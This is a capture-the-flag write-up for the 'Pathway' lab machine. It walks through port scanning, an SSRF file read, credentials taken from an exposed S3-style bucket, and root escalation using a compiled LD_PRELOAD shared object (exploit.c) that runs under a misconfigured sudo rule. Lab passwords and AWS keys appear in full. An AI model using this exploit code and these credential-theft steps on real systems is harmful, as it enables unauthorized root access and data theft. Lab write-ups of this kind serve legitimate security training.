Pathway

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.210.230 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-04 19:50 UTC
Nmap scan report for 192.168.210.230                                                                                                                                        
Host is up, received echo-reply ttl 61 (0.15s latency).                                                                                                                     
Scanned at 2025-11-04 19:50:43 UTC for 152s                                                                                                                                 
Not shown: 65520 closed tcp ports (reset), 11 filtered tcp ports (no-response)                                                                                              
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit                                                                                                 
PORT     STATE SERVICE    REASON         VERSION                                                                                                                            
22/tcp   open  ssh        syn-ack ttl 61 OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)                                                                                      
| ssh-hostkey:                                                                                                                                                              
|   256 fc:72:06:8f:ef:ec:9b:87:f3:95:ca:f2:e7:1f:ea:dc (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFyksaWzSNfPbN6T3ts7+fGJ0/9aIXrN7HimSzjO+W6pfa1Qq4QZb/hnkglJwvjgcTOQiraq2M9EQ9JtbRC1ROY=
|   256 42:c2:f0:fd:85:f6:93:cb:bd:a0:e8:ed:c1:a2:6d:60 (ED25519)                     
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHbDRRUQ2YifMbadcFEg6fdgQ2bcGEHcQyrud/UFwLiy                                                                                          
80/tcp   open  http       syn-ack ttl 61 nginx 1.22.1                                 
|_http-title: Chain App Dev                                                           
|_http-server-header: nginx/1.22.1                                                                                                                                          
| http-methods:                                                                       
|_  Supported Methods: GET HEAD POST                                                  
3089/tcp open  ptk-alink? syn-ack ttl 61                                              
| fingerprint-strings:                                                                
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessio
nReq, TerminalServerCookie, X11Probe:                                                                                                                                       
|     HTTP/1.1 400 Bad Request                                                        
|     Connection: close                                                               
|   FourOhFourRequest:                                                                
|     HTTP/1.1 400 Bad Request                                                        
|     content-type: text/plain; charset=UTF-8                                         
|     Date: Tue, 04 Nov 2025 19:51:22 GMT                                             
|     Connection: close                                                                                                                                                     
|   GetRequest, HTTPOptions:                                                          
|     HTTP/1.1 400 Bad Request                                                        
|     content-type: text/plain; charset=UTF-8                                                                                                                               
|     Date: Tue, 04 Nov 2025 19:51:18 GMT                                             
|     Connection: close                                                                                                                                                     
|   RTSPRequest:                                                                      
|     HTTP/1.1 400 Bad Request                                                        
|     content-type: text/plain; charset=UTF-8                                                                                                                               
|     Date: Tue, 04 Nov 2025 19:51:19 GMT                                             
|_    Connection: close                                                               
4566/tcp open  http       syn-ack ttl 60 TwistedWeb httpd 24.3.0                      
| http-methods:                                                                       
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                                
|_http-server-header: TwistedWeb/24.3.0|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
<snipped>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

We have ssh open on port 22, http on port 80, and other two open ports.

SSH (20):

Since we do not have set of credentials, we will skip interacting with ssh at the moment.

HTTP (80):

On port 80, only a static page without any further functioanlities.

? (3089):

It asks for the url parameter, lets set it and put any value to see how we can paly with this.

Here we identified SSRF vulnerability.

Check also with other scheme like file:// to see if we can access the internal files:

There is a real vulnerability in an application called url to png which likely the one we have here.

I stopped enumerating this port because I did not find anything useful.

? (4566):

Just a blank page.

If we directory busted this:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ gobuster dir -u http://192.168.210.230:4566/ -w /usr/share/wordlists/dirb/common.txt -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.210.230:4566/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/internal             (Status: 200) [Size: 626]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================

Lets navigate to that directory:

Here we have an internal bucket named internal, and one key object in it called users.json.

Get into that:

We will have set of credentials for two users.

See if those are valid:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u brian -p T@k9B#LmX2^VzJ6p 
SSH         192.168.210.230 22     192.168.210.230  [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH         192.168.210.230 22     192.168.210.230  [+] brian:T@k9B#LmX2^VzJ6p  Linux - Shell access!

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u huzaid -p 'M4&dX-Yq7Nz#5RbC'
SSH         192.168.210.230 22     192.168.210.230  [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH         192.168.210.230 22     192.168.210.230  [+] huzaid:M4&dX-Yq7Nz#5RbC  Linux - Shell access!

Both are valid.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ssh brian@192.168.210.230           
The authenticity of host '192.168.210.230 (192.168.210.230)' can't be established.
ED25519 key fingerprint is SHA256:DklQpxrLtoaufgj7p+2aDA6cAHCcLgqzj6qfqHm1nHw.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:30: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.210.230' (ED25519) to the list of known hosts.
brian@192.168.210.230's password: 
Linux pathway 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
brian@pathway:~$

Post-Exploitation:

The first local enumeration we can do, is to check what we can run with sudo:

brian@pathway:~$ sudo -l
Matching Defaults entries for brian on pathway:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty, env_keep+=LD_PRELOAD

User brian may run the following commands on pathway:
    (ALL) NOPASSWD: /usr/bin/ping

We will see LD_PRELOAD is preserved by sudo due to env_keep misconfiguration, allowing library injection into privileged processes.

First we will create a shared object then assign it to the env_keep variable:

brian@pathway:~$ cat exploit.c 
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
brian@pathway:~$ gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
exploit.c: In function ‘_init’:
exploit.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    7 |     setgid(0);
      |     ^~~~~~
exploit.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    8 |     setuid(0);
      |     ^~~~~~
brian@pathway:~$ ls
exploit.c  exploit.so  local.txt

Now we can use this to get root access:

brian@pathway:~$  sudo LD_PRELOAD=/home/brian/exploit.so /usr/bin/ping
root@pathway:/home/brian#

Get the flags:

root@pathway:/home/brian# cat local.txt 
f28dc69735cf0340918ca803f67a29b0
root@pathway:/home/brian# cat /root/proof.txt 
893abbf5118bc8e3865b742a46fe72d0

After I solved the box, I found this was not the intended way to get intial access.

We should read a file called .env under url-to-png-2.0.2 directory to get credentials for aws access:

Pull the access key id and secret access key from the image so we can interact with aws services if we have permissions:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws configure --profile=Pathway
AWS Access Key ID [None]: AKIA7826a5d1963a4e6b
AWS Secret Access Key [None]: jIOzrNK0FXBeafVXQvXqDh1pS8frf0QqIS3BsN1OjAI
Default region name [None]: us-east-1
Default output format [None]: json

Within aws cli we can view who we are using this subcommand sts get-caller-identity:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws sts get-caller-identity --profile Pathway --endpoint-url http://192.168.210.230:4566
{
    "UserId": "AKIAIOSFODNN7EXAMPLE",
    "Account": "000000000000",
    "Arn": "arn:aws:iam::000000000000:root"
}

We are an iam user called root in that aws account.

Now lets view the bucket named internal:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 ls s3://internal --profile Pathway --endpoint-url http://192.168.210.230:4566
2025-11-04 19:54:28      15364 11-4-2025.fileetcpasswd.png
2025-11-04 20:06:12     447681 11-4-2025.fileetcpasswd_width-4000.png                 
2025-11-04 20:01:22       2747 11-4-2025.httplocalhost.png                            
2025-11-04 20:02:54       2221 11-4-2025.httplocalhost3089.png
2025-11-04 20:03:14      41904 11-4-2025.httplocalhost3089_width-4000.png
2025-11-04 20:02:50        762 11-4-2025.httplocalhost4566.png
2025-11-04 20:02:46       2747 11-4-2025.httplocalhost80.png
2025-11-04 19:55:12     836872 11-4-2025.view-sourcefile_width-4000.png
2025-11-04 19:54:56      16083 11-4-2025.view-sourcefileetcpasswd.png
2025-11-04 19:55:33     470414 11-4-2025.view-sourcefileetcpasswd_width-4000.png      
2025-11-04 19:55:58      70017 11-4-2025.view-sourcefilehomehuzaidawscredentials_width-4000.png
2025-11-04 20:26:06     732792 11-4-2025.view-sourcefileopturl-to-png-202env_width-4000.png
2025-11-04 19:56:38      21703 11-4-2025.view-sourcefileprocselfenviron_width-4000.png 
2025-11-04 19:51:54        381 users.json

It contains a bunch of images, but what we are most interested in is that users.json file we saw earlier.

We can copy it to our machine using cp:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 cp s3://internal/users.json . --profile Pathway --endpoint-url http://192.168.210.230:4566
download: s3://internal/users.json to ./users.json                

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ls    
nmap  users.json

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ cat users.json 
[
    {
        "full name": "Brian Stove",
        "username": "brian",
        "role": "IT admin",
        "email": "alsina@mailtech.offsec",
        "password": "T@k9B#LmX2^VzJ6p"
    },
    {
        "full name": "Huzaid Doodo",
        "username": "huzaid",
        "role": "Helpdesk",
        "email": "huzaid@mailtech.offsec",
        "password": "M4&dX-Yq7Nz#5RbC"
    }
]

We will get the same result and we can continue from here what we did to elevate our privileges.